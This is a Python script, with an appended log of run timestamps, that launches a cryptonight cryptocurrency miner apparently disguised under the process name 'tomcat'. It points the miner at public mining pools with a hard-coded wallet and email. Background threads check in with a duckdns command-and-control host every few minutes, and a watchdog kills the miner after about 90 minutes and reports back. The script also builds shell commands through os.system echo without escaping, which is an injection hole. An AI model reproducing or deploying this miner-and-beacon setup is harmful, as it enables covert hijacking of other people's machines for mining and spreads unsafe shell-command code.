import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:15:01.772083
#2018-02-17 17:03:06.406578
#2018-02-17 18:50:05.867408
#2018-02-17 20:40:06.163976
#2018-02-17 22:27:02.002540
#2018-02-18 00:10:07.279175
#2018-02-18 02:02:07.238974
#2018-02-18 03:49:06.609430
#2018-02-18 05:36:06.519678
#2018-02-18 07:29:06.216719
#2018-02-18 09:17:03.775579
#2018-02-18 11:03:03.622983
#2018-02-18 12:49:03.837853
#2018-02-18 14:36:05.400591
#2018-02-18 16:25:02.868007
#2018-02-18 18:14:04.129739
#2018-02-18 20:00:01.905526
#2018-02-18 21:46:04.261270
#2018-02-18 23:34:06.056273
#2018-02-19 01:19:05.946341
#2018-02-19 03:07:06.921561
#2018-02-19 04:52:06.620491
#2018-02-19 06:36:05.594975
#2018-02-19 08:26:01.731987
#2018-02-19 10:15:01.511602
#2018-02-19 12:02:05.628633
#2018-02-19 13:50:04.825529
#2018-02-19 15:39:06.082498
#2018-02-19 17:25:09.521097
#2018-02-19 19:12:08.277720
#2018-02-19 20:59:05.255488
#2018-02-19 22:47:01.366934
#2018-02-20 00:32:05.971036
#2018-02-20 02:21:06.766789
#2018-02-20 04:11:08.338190
#2018-02-20 05:54:06.467021
#2018-02-20 07:39:06.578527
#2018-02-20 09:23:04.734659
#2018-02-20 11:07:01.655042
#2018-02-20 12:53:04.430179
#2018-02-20 14:37:06.825499
#2018-02-20 16:22:07.469593
#2018-02-20 18:10:01.438905
#2018-02-20 20:01:09.416577
#2018-02-20 21:49:04.707092
#2018-02-20 23:30:10.214634
#2018-02-21 01:15:05.500852
#2018-02-21 03:02:07.400984
#2018-02-21 04:48:06.269863
#2018-02-21 06:36:06.529519
#2018-02-21 08:22:04.092731
#2018-02-21 10:07:07.703049
#2018-02-21 11:54:08.961748
#2018-02-21 13:44:10.488416
#2018-02-21 15:32:04.911994
#2018-02-21 17:21:07.616896
#2018-02-21 19:10:08.639075
#2018-02-21 20:56:07.677584
#2018-02-21 22:41:05.772187
#2018-02-22 00:29:06.055626
#2018-02-22 02:17:06.498521
#2018-02-22 04:03:04.863602
#2018-02-22 05:49:05.735366
#2018-02-22 07:36:01.961085
#2018-02-22 09:24:01.830059
#2018-02-22 11:10:04.403837
#2018-02-22 12:57:06.869949
#2018-02-22 14:45:06.459262
#2018-02-22 16:29:01.558685
#2018-02-22 18:15:13.937376
#2018-02-22 20:04:08.328894
#2018-02-22 21:53:04.756844
#2018-02-22 23:40:01.751439
#2018-02-23 01:27:05.329909
#2018-02-23 03:13:06.145879
#2018-02-23 05:00:01.835685
#2018-02-23 06:44:04.134535
#2018-02-23 08:35:06.890719
#2018-02-23 10:49:09.771831
#2018-02-23 12:47:10.933603
#2018-02-23 14:32:04.119847
#2018-02-23 16:21:07.470246
#2018-02-23 18:07:02.124848
#2018-02-23 19:52:06.797032
#2018-02-23 21:37:07.045193
#2018-02-23 23:26:05.572062
#2018-02-24 01:19:01.873908
#2018-02-24 03:08:08.415704
#2018-02-24 04:54:06.749039
#2018-02-24 06:39:05.161536
#2018-02-24 08:28:04.518139
#2018-02-24 10:14:06.995356
#2018-02-24 12:08:07.425220
#2018-02-24 13:55:05.999091
#2018-02-24 15:47:07.096631
#2018-02-24 17:44:07.625268
#2018-02-24 19:32:05.217158
#2018-02-24 21:20:08.624581
#2018-02-24 23:59:03.685610
#2018-02-25 04:09:01.949696
#2018-02-25 07:40:01.558681